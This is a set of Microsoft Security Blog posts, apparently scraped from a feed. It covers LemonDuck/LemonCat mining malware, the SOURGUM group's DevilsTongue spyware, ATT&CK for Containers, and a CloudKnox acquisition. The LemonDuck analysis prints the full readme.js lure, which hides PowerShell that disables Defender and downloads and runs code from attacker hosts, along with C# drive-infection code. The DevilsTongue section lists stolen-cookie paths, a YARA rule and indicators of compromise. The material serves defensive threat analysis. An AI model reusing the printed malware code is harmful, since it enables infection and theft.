The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.

 

Sample Duck domains Sample Cat domains
  • cdnimages[.]xyz
  • bb3u9[.]com
  • zz3r0[.]com
  • pp6r1[.]com
  • amynx[.]com
  • ackng[.]com
  • hwqloan[.]com
  • js88[.]ag
  • zer9g[.]com
  • b69kq[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • down[.]sqlnetcat[.]com

 

The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.

 

Sample email subjects Sample email body content
  • The Truth of COVID-19
  • COVID-19 nCov Special info WHO
  • HALTH ADVISORY:CORONA VIRUS
  • WTF
  • What the fcuk
  • good bye
  • farewell letter
  • broken file
  • This is your order?
  • Virus actually comes from United States of America
  • very important infomation for Covid-19
  • see attached document for your action and discretion.
  • the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
  • what’s wrong with you?are you out of your mind!!!!!
  • are you out of your mind!!!!!what ‘s wrong with you?
  • good bye, keep in touch
  • can you help me to fix the file,i can’t read it
  • file is brokened, i can’t open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as custom detection rules.

Since LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.

 

April 2020 PowerShell script March 2021 PowerShell script var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken. var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);
//This File is broken.

 

After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
{
if (!File.Exists(drive + home + inf_data))
{
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
{
blacklist.Add(drive.Name);
}
}
else {
Console.WriteLine(drive.Name+" already infected!");
blacklist.Add(drive.Name);
}
}
else{
blacklist.Add(drive.Name);

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.

 

Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management

Microsoft Malware Protection Center - Wed, 07/21/2021 - 12:05pm

Today on the Official Microsoft Blog, Microsoft announced the acquisition of CloudKnox Security, a leader in Cloud Infrastructure Entitlement Management (CIEM). CloudKnox offers complete visibility into privileged access. It helps organizations right-size permissions and consistently enforce least-privilege principles to reduce risk, and it employs continuous analytics to help prevent security breaches and ensure compliance. The acquisition further enables Microsoft Azure Active Directory (Azure AD) customers with granular visibility, continuous monitoring, and automated remediation for hybrid and multi-cloud permissions.

As the corporate network perimeter disappears, it’s crucial to establish a strong cloud identity foundation through a Zero Trust approach so you can protect business-critical systems, while improving business agility. We’re committed to making it easier to enforce appropriate, tailored privileges and other identity controls across multi-cloud environments, as organizations adapt to hybrid work, new risks, and business transformation.

Read more on Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 

 

 

 

The post Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management appeared first on Microsoft Security Blog.

Categories: Microsoft

The evolution of a matrix: How ATT&CK for Containers was built

Microsoft Malware Protection Center - Wed, 07/21/2021 - 12:00pm

Note: The content of this post is being released jointly with the Center for Threat-Informed Defense. It is co-authored with Chris Ante and Matthew Bajzek. The Center post can be found here.

As containers become a major part of many organizations’ IT workloads, it becomes crucial to consider the unique security threats that target such environments when building security solutions. The first step in this process is understanding the relevant attack landscape.

The MITRE ATT&CK® team has received frequent questions from the community about if or when ATT&CK would include coverage for adversary behavior in containers. Previous iterations of ATT&CK have included references to containers (for example, Resource Hijacking) and some clearly container-relevant techniques (for example, Implant Internal Image), but the coverage was insufficient to provide network defenders a holistic view of how containers are being targeted in enterprise environments.

Addressing the need for a common framework for understanding container threats

Given clear community interest, inspiration from Microsoft’s work on the threat matrix for Kubernetes, and the publication of research from other teams, the Center for Threat-Informed Defense launched an investigation (sponsored by several Center members including Microsoft) that examined the viability of adding containers content to ATT&CK. The purpose of the Container Techniques project was to investigate adversarial behavior in containerization technologies and determine whether there was enough open-source intelligence to warrant the creation of an ATT&CK for Containers matrix, resulting in either new ATT&CK content or a report on the state of in-the-wild Container-based tactics, techniques, and procedures (TTPs). The Center’s research team quickly concluded that there was more than enough open-source intelligence to justify technique development, ultimately resulting in the new matrix.

As of the ATT&CK v9 release, the ATT&CK for Containers matrix is officially available. More details about the Containers matrix can be found in MITRE-Engenuity’s announcement blog. Some highlights of the new matrix include related software entries, procedure examples to help network defenders better understand new container-centric techniques, data sources to match the recent ATT&CK data sources refactor, and many others.

Figure 1. ATT&CK for Containers matrix.

Evolving the threat matrix

MITRE ATT&CK has become the common vocabulary for describing real-world adversary behavior. ATT&CK offers organizations a method to measure their defenses against threats that impact their environment and identify possible gaps. With ATT&CK’s approach of methodically outlining the possible threats, Microsoft built the threat matrix for Kubernetes, which was one of the first attempts to systematically map the attack surface of Kubernetes. An updated version of the matrix was released earlier in 2021.

Figure 2: Threat matrix for Kubernetes.

Microsoft took part in the Center’s project and contributed knowledge that the company gained in the field of container security. Microsoft’s unparalleled visibility into threats helps to identify real-world attacks against containerized workloads and provide information about tactics and techniques used in those attacks. One example of such an attack is a cryptocurrency mining campaign that targeted Kubernetes. In this incident, Microsoft saw evidence of the following techniques from the Microsoft threat matrix:

  • Exposed sensitive interfaces
  • New container
  • Pod/container name similarity
  • List Kubernetes secrets
  • Access Kubernetes API server
  • Resource Hijacking

The techniques that went into ATT&CK for Containers are different from those in the Microsoft threat matrix. As described in a blog post by the Center, it was preferable to use an existing ATT&CK technique rather than create a new one when possible. Therefore, several techniques from the threat matrix were mapped into existing Enterprise ATT&CK techniques. For example, in the techniques listed above, “Exposed sensitive interfaces” from the threat matrix is equivalent to ATT&CK’s “External Remote Services.”

The Center’s process for leveraging Microsoft’s Kubernetes threat matrix was as follows:

  • Cross-referencing threat intelligence with the techniques in the Kubernetes threat matrix.
  • Determining whether techniques with sufficient intelligence backing were already covered by existing Enterprise ATT&CK techniques, or whether they justified the creation of one or more new techniques or sub-techniques.

Considering Microsoft’s tactics mapping for specific techniques and how they fit within ATT&CK’s Enterprise, Cloud, and Containers matrix scoping, as in the case of multiple forms of “lateral movement,” the Center instead identified pivots from one ATT&CK platform matrix to another (for example, Containers to Cloud).

The following are examples of techniques from Microsoft’s matrix that were re-scoped to fit into existing Enterprise ATT&CK techniques:

Microsoft threat matrix   MITRE ATT&CK Application vulnerability –> Exploit Public-Facing Application Exposed sensitive interfaces –> External Remote Services Clear container logs –> Indicator Removal on Host Pod/container name similarity –> Masquerading: Match Legitimate Name or Location Access Kubelet API –> Network Service Scanning

Meanwhile, the following are examples of techniques from the Microsoft threat matrix that were re-scoped based on the Center’s platform decisions and additional open-source intelligence, with additional detail on each technique/sub-technique available in its description within ATT&CK for Containers:

Microsoft threat matrix   MITRE ATT&CK Exec into container + bash/cmd inside container –> Container Administration Command New container –> Deploy Container Kubernetes CronJob –> Scheduled Task/Job: Container Orchestration Job HostPath mount + Writable volume mounts on the host –> Escape to Host

Not all the techniques and tactics that appear in the Microsoft threat matrix went into the new ATT&CK matrix. ATT&CK focuses on real-world techniques that are seen in the wild. In contrast, many of the techniques in the threat matrix were observed during research work and not necessarily as part of an active attack. For example, “CoreDNS poisoning” from the updated matrix is a possible attack vector but hasn’t been seen in the wild yet.

ATT&CK is dynamic

ATT&CK for Containers is by no means finished, and we look forward to future additions based on new intelligence and further community contributions. Before the public release of ATT&CK for Containers, Microsoft released an updated version of the threat matrix for Kubernetes, which speaks to the fast-paced evolution of this technology space and the need to keep up with new adversary behaviors.

The next step for the ATT&CK team is to assess the new content in Microsoft’s matrix and consider it for potential future inclusion in ATT&CK based on the factors described above. Microsoft and the ATT&CK team will continue to collaborate to ensure that container techniques coverage in ATT&CK is up-to-date and can continue to serve the need of the community.

With the completion of this Center project, ATT&CK for Containers will be maintained by the ATT&CK team, who would love your continuous feedback and contribution! Let the team know what you think, what could be improved, and most importantly what you see adversaries doing in the wild related to containers. Feel free to send an email at any time to attack@mitre.org. If you have ideas for other research and development projects that the Center should consider, please send an email to ctid@mitre-engenuity.org.

Learn more

To learn how Microsoft can help you protect containers and relevant technologies today, read about Microsoft Defender for Endpoint and Azure Defender.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The evolution of a matrix: How ATT&CK for Containers was built appeared first on Microsoft Security Blog.

Categories: Microsoft

Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware

Microsoft Malware Protection Center - Thu, 07/15/2021 - 11:21am

The Microsoft Threat Intelligence Center (MSTIC) alongside the Microsoft Security Response Center (MSRC) has uncovered a private-sector offensive actor, or PSOA, that we are calling SOURGUM in possession of now-patched, Windows 0-day exploits (CVE-2021-31979 and CVE-2021-33771).

Private-sector offensive actors are private companies that manufacture and sell cyberweapons in hacking-as-a-service packages, often to government agencies around the world, to hack into their targets’ computers, phones, network infrastructure, and other devices. With these hacking packages, usually the government agencies choose the targets and run the actual operations themselves. The tools, tactics, and procedures used by these companies only adds to the complexity, scale, and sophistication of attacks. We take these threats seriously and have moved swiftly alongside our partners to build in the latest protections for our customers.

MSTIC believes SOURGUM is an Israel-based private-sector offensive actor. We would like to thank the Citizen Lab, at the University of Toronto’s Munk School, for sharing the sample of malware that initiated this work and their collaboration during the investigation. In their blog, Citizen Lab asserts with high confidence that SOURGUM is an Israeli company commonly known as Candiru. Third-party reports indicate Candiru produces “hacking tools [that] are used to break into computers and servers”.  

As we shared in the Microsoft on the Issues blog, Microsoft and Citizen Lab have worked together to disable the malware being used by SOURGUM that targeted more than 100 victims around the world including politicians, human rights activists, journalists, academics, embassy workers, and political dissidents. To limit these attacks, Microsoft has created and built protections into our products against this unique malware, which we are calling DevilsTongue. We have shared these protections with the security community so that we can collectively address and mitigate this threat. We have also issued a software update that will protect Windows customers from the associated exploits that the actor used to help deliver its highly sophisticated malware.

SOURGUM victimology

Media reports (1, 2, 3) indicate that PSOAs often sell Windows exploits and malware in hacking-as-a-service packages to government agencies. Agencies in Uzbekistan, United Arab Emirates, and Saudi Arabia are among the list of Candiru’s alleged previous customers. These agencies, then, likely choose whom to target and run the cyberoperations themselves.

Microsoft has identified over 100 victims of SOURGUM’s malware, and these victims are as geographically diverse as would be expected when varied government agencies are believed to be selecting the targets. Approximately half of the victims were found in Palestinian Authority, with most of the remaining victims located in Israel, Iran, Lebanon, Yemen, Spain (Catalonia), United Kingdom, Turkey, Armenia, and Singapore. To be clear, the identification of victims of the malware in a country doesn’t necessarily mean that an agency in that country is a SOURGUM customer, as international targeting is common.

Any Microsoft 365 Defender and Microsoft Defender for Endpoint alerts containing detection names for the DevilsTongue malware name are signs of compromise by SOURGUM’s malware. We have included a comprehensive list of detection names below for customers to perform additional hunting in their environments.

Exploits

SOURGUM appears to use a chain of browser and Windows exploits, including 0-days, to install malware on victim boxes. Browser exploits appear to be served via single-use URLs sent to targets on messaging applications such as WhatsApp.

During the investigation, Microsoft discovered two Windows 0-day exploits for vulnerabilities tracked as CVE-2021-31979 and CVE-2021-33771, both of which have been fixed in the July 2021 security updates. These vulnerabilities allow privilege escalation, giving an attacker the ability to escape browser sandboxes and gain kernel code execution. If customers have taken the July 2021 security update, they are protected from these exploits.

CVE-2021-31979 fixes an integer overflow within Windows NT-based operating system (NTOS). This overflow results in an incorrect buffer size being calculated, which is then used to allocate a buffer in the kernel pool. A buffer overflow subsequently occurs while copying memory to the smaller-than-expected destination buffer. This vulnerability can be leveraged to corrupt an object in an adjacent memory allocation. Using APIs from user mode, the kernel pool memory layout can be groomed with controlled allocations, resulting in an object being placed in the adjacent memory location. Once corrupted by the buffer overflow, this object can be turned into a user mode to kernel mode read/write primitive. With these primitives in place, an attacker can then elevate their privileges.

CVE-2021-33771 addresses a race condition within NTOS resulting in the use-after-free of a kernel object. By using multiple racing threads, the kernel object can be freed, and the freed memory reclaimed by a controllable object. Like the previous vulnerability, the kernel pool memory can be sprayed with allocations using user mode APIs with the hopes of landing an object allocation within the recently freed memory. If successful, the controllable object can be used to form a user mode to kernel mode read/write primitive and elevate privileges.

DevilsTongue malware overview

DevilsTongue is a complex modular multi-threaded piece of malware written in C and C++ with several novel capabilities. Analysis is still on-going for some components and capabilities, but we’re sharing our present understanding of the malware so defenders can use this intelligence to protect networks and so other researchers can build on our analysis.

For files on disk, PDB paths and PE timestamps are scrubbed, strings and configs are encrypted, and each file has a unique hash. The main functionality resides in DLLs that are encrypted on disk and only decrypted in memory, making detection more difficult. Configuration and tasking data is separate from the malware, which makes analysis harder.  DevilsTongue has both user mode and kernel mode capabilities. There are several novel detection evasion mechanisms built in. All these features are evidence that SOURGUM developers are very professional, have extensive experience writing Windows malware, and have a good understanding of operational security.

When the malware is installed, a first-stage ‘hijack’ malware DLL is dropped in a subfolder of C:\Windows\system32\IME\; the folders and names of the hijack DLLs blend with legitimate names in the \IME\ directories. Encrypted second-stage malware and config files are dropped into subfolders of C:\Windows\system32\config\ with a .dat file extension. A third-party legitimate, signed driver physmem.sys is dropped to the system32 folder. A file called WimBootConfigurations.ini is also dropped; this file has the command for following the COM hijack. Finally, the malware adds the hijack DLL to a COM class registry key, overwriting the legitimate COM DLL path that was there, achieving persistence via COM hijacking.

From the COM hijacking, the DevilsTongue first-stage hijack DLL gets loaded into a svchost.exe process to run with SYSTEM permissions. The COM hijacking technique means that the original DLL that was in the COM registry key isn’t loaded. This can break system functionality and trigger an investigation that could lead to the discovery of the malware, but DevilsTongue uses an interesting technique to avoid this. In its DllMain function it calls LoadLibrary on the original COM DLL so it is correctly loaded into the process. DevilsTongue then searches the call stack to find the return address of LoadLibraryExW (i.e., the function currently loading the DevilsTongue DLL),  which would usually return the base address of the DevilsTongue DLL.

Once the LoadLibraryExW return address has been found, DevilsTongue allocates a small buffer with shellcode that puts the COM DLL’s base address (imecfmup.7FFE49060000 in Figure 1) into the rax register and then jumps to the original return address of LoadLibraryExW (svchost.7FF78E903BFB in Figures 1 and 2). In Figure 1 the COM DLL is named imecfmup rather than a legitimate COM DLL name because some DevilsTongue samples copied the COM DLL to another location and renamed it.

Figure 1. DevilsTongue return address modification shellcode

DevilsTongue then swaps the original LoadLibraryExW return address on the stack with the address of the shellcode so that when LoadLibraryExW returns it does so into the shellcode (Figures 2 and 3). The shellcode replaces the DevilsTongue base address in rax with the COM DLL’s base address, making it look like LoadLibraryExW has returned the COM DLL’s address. The svchost.exe host process now uses the returned COM DLL base address as it usually would.

Figure 2. Call stack before stack swap, LoadLibraryExW in kernelbase returning to svchost.exe (0x7FF78E903BFB)

Figure 3. Call stack after stack swap, LoadLibraryExW in kernelbase returning to the shellcode address (0x156C51E0000 from Figure 1)

This technique ensures that the DevilsTongue DLL is loaded by the svchost.exe process, giving the malware persistence, but that the legitimate COM DLL is also loaded correctly so there’s no noticeable change in functionality on the victim’s systems.

After this, the hijack DLL then decrypts and loads a second-stage malware DLL from one of the encrypted .dat files. The second-stage malware decrypts another .dat file that contains multiple helper DLLs that it relies on for functionality.

DevilsTongue has standard malware capabilities, including file collection, registry querying, running WMI commands, and querying SQLite databases. It’s capable of stealing victim credentials from both LSASS and from browsers, such as Chrome and Firefox. It also has dedicated functionality to decrypt and exfiltrate conversations from the Signal messaging app.

It can retrieve cookies from a variety of web browsers. These stolen cookies can later be used by the attacker to sign in as the victim to websites to enable further information gathering. Cookies can be collected from these paths (* is a wildcard to match any folders):

  • %LOCALAPPDATA%\Chromium\User Data\*\Cookies
  • %LOCALAPPDATA%\Google\Chrome\User Data\*\Cookies
  • %LOCALAPPDATA%\Microsoft\Windows\INetCookies
  • %LOCALAPPDATA%\Packages\*\AC\*\MicrosoftEdge\Cookies
  • %LOCALAPPDATA%\UCBrowser\User Data_i18n\*\Cookies.9
  • %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\*\Cookies
  • %APPDATA%\Apple Computer\Safari\Cookies\Cookies.binarycookies
  • %APPDATA%\Microsoft\Windows\Cookies
  • %APPDATA%\Mozilla\Firefox\Profiles\*\cookies.sqlite
  • %APPDATA%\Opera Software\Opera Stable\Cookies

Interestingly, DevilsTongue seems able to use cookies directly from the victim’s computer on websites such as Facebook, Twitter, Gmail, Yahoo, Mail.ru, Odnoklassniki, and Vkontakte to collect information, read the victim’s messages, and retrieve photos. DevilsTongue can also send messages as the victim on some of these websites, appearing to any recipient that the victim had sent these messages. The capability to send messages could be weaponized to send malicious links to more victims.

Alongside DevilsTongue a third-party signed driver is dropped to C:\Windows\system32\physmem.sys. The driver’s description is “Physical Memory Access Driver,” and it appears to offer a “by-design” kernel read/write capability. This appears to be abused by DevilsTongue to proxy certain API calls via the kernel to hinder detection, including the capability to have some of the calls appear from other processes. Functions capable of being proxied include CreateProcessW, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, ReadProcessMemory, CreateFileW and RegSetKeyValueW.

Prevention and detection

To prevent compromise from browser exploits, it’s recommended to use an isolated environment, such as a virtual machine, when opening links from untrusted parties. Using a modern version of Windows 10 with virtualization-based protections, such as Credential Guard, prevents DevilsTongue’s LSASS credential-stealing capabilities. Enabling the attack surface reduction rule “Block abuse of exploited vulnerable signed drivers” in Microsoft Defender for Endpoint blocks the driver that DevilsTongue uses. Network protection blocks known SOURGUM domains.

Detection opportunities

This section is intended to serve as a non-exhaustive guide to help customers and peers in the cybersecurity industry to detect the DevilsTongue malware. We’re providing this guidance with the expectation that SOURGUM will likely change the characteristics we identify for detection in their next iteration of the malware. Given the actor’s level of sophistication, however, we believe that outcome would likely occur irrespective of our public guidance.

File locations

The hijack DLLs are in subfolders of \system32\ime\ with names starting with ‘im’. However, they are blended with legitimate DLLs in those folders. To distinguish between the malicious and benign, the legitimate DLLs are signed (on Windows 10) whereas the DevilsTongue files aren’t. Example paths:

  • C:\Windows\System32\IME\IMEJP\imjpueact.dll
  • C:\Windows\system32\ime\IMETC\IMTCPROT.DLL
  • C:\Windows\system32\ime\SHARED\imecpmeid.dll

 The DevilsTongue configuration files, which are AES-encrypted, are in subfolders of C:\Windows\system32\config\ and have a .dat extension. The exact paths are victim-specific, although some folder names are common across victims. As the files are AES-encrypted, any files whose size mod 16 is 0 can be considered as a possible malware config file. The config files are always in new folders, not the legitimate existing folders (e.g., on Windows 10, never in \Journal, \systemprofile, \TxR etc.). Example paths:

  • C:\Windows\system32\config\spp\ServiceState\Recovery\pac.dat
  • C:\Windows\system32\config\cy-GB\Setup\SKB\InputMethod\TupTask.dat
  • C:\Windows\system32\config\config\startwus.dat

Commonly reused folder names in the config file paths:

  • spp
  • SKB
  • curv
  • networklist
  • Licenses
  • InputMethod
  • Recovery

The .ini reg file has the unique name WimBootConfigurations.ini and is in a subfolder of system32\ime\. Example paths:

  • C:\Windows\system32\ime\SHARED\WimBootConfigurations.ini
  • C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini
  • C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini

The Physmem driver is dropped into system32:

  • C:\Windows\system32\physmem.sys
Behaviors

The two COM keys that have been observed being hijacked for persistence are listed below with their default clean values. If their default value DLL is in the \system32\ime\ folder, the DLL is likely DevilsTongue.

  • HKLM\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 = %systemroot%\system32\wbem\wmiutils.dll (clean default value)
  • HKLM\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32 = %systemroot%\system32\wbem\wbemsvc.dll (clean default value)
File content and characteristics

This Yara rule can be used to find the DevilsTongue hijack DLL:

import "pe"
rule DevilsTongue_HijackDll
{
meta:
description = "Detects SOURGUM's DevilsTongue hijack DLL"
author = "Microsoft Threat Intelligence Center (MSTIC)"
date = "2021-07-15"
strings:
$str1 = "windows.old\\windows" wide
$str2 = "NtQueryInformationThread"
$str3 = "dbgHelp.dll" wide
$str4 = "StackWalk64"
$str5 = "ConvertSidToStringSidW"
$str6 = "S-1-5-18" wide
$str7 = "SMNew.dll" // DLL original name
// Call check in stack manipulation
// B8 FF 15 00 00   mov     eax, 15FFh
// 66 39 41 FA      cmp     [rcx-6], ax
// 74 06            jz      short loc_1800042B9
// 80 79 FB E8      cmp     byte ptr [rcx-5], 0E8h ; 'è'
$code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}
// PRNG to generate number of times to sleep 1s before exiting
// 44 8B C0 mov r8d, eax
// B8 B5 81 4E 1B mov eax, 1B4E81B5h
// 41 F7 E8 imul r8d
// C1 FA 05 sar edx, 5
// 8B CA    mov ecx, edx
// C1 E9 1F shr ecx, 1Fh
// 03 D1    add edx, ecx
// 69 CA 2C 01 00 00 imul ecx, edx, 12Ch
// 44 2B C1 sub r8d, ecx
// 45 85 C0 test r8d, r8d
// 7E 19    jle  short loc_1800014D0
$code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}
condition:
filesize < 800KB and
uint16(0) == 0x5A4D and
(pe.characteristics & pe.DLL) and
(
4 of them or
($code1 and $code2) or
(pe.imphash() == "9a964e810949704ff7b4a393d9adda60")
)
}

Microsoft Defender Antivirus detections

Microsoft Defender Antivirus detects DevilsTongue malware with the following detections:

  • Trojan:Win32/DevilsTongue.A!dha
  • Trojan:Win32/DevilsTongue.B!dha
  • Trojan:Script/DevilsTongueIni.A!dha
  • VirTool:Win32/DevilsTongueConfig.A!dha
  • HackTool:Win32/DevilsTongueDriver.A!dha
Microsoft Defender for Endpoint alerts

Alerts with the following titles in the security center can indicate DevilsTongue malware activity on your network:

  • COM Hijacking
  • Possible theft of sensitive web browser information
  • Stolen SSO cookies 
Azure Sentinel query

To locate possible SOURGUM activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)

No malware hashes are being shared because DevilsTongue files, except for the third part driver below, all have unique hashes, and therefore, are not a useful indicator of compromise.

Physmem driver

Note that this driver may be used legitimately, but if it’s seen on path C:\Windows\system32\physmem.sys then it is a high-confidence indicator of DevilsTongue activity. The hashes below are provided for the one driver observed in use.

  • MD5: a0e2223868b6133c5712ba5ed20c3e8a
  • SHA-1: 17614fdee3b89272e99758983b99111cbb1b312c
  • SHA-256: c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d
Domains
  • noc-service-streamer[.]com
  • fbcdnads[.]live
  • hilocake[.]info
  • backxercise[.]com
  • winmslaf[.]xyz
  • service-deamon[.]com
  • online-affiliate-mon[.]com
  • codeingasmylife[.]com
  • kenoratravels[.]com
  • weathercheck[.]digital
  • colorpallatess[.]com
  • library-update[.]com
  • online-source-validate[.]com
  • grayhornet[.]com
  • johnshopkin[.]net
  • eulenformacion[.]com
  • pochtarossiy[.]info

The post Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft delivers comprehensive solution to battle rise in consent phishing emails

Microsoft Malware Protection Center - Wed, 07/14/2021 - 1:00pm

Microsoft threat analysts are tracking a continued increase in consent phishing emails, also called illicit consent grants, that abuse OAuth request links in an attempt to trick recipients into granting attacker-owned apps permissions to access sensitive data.

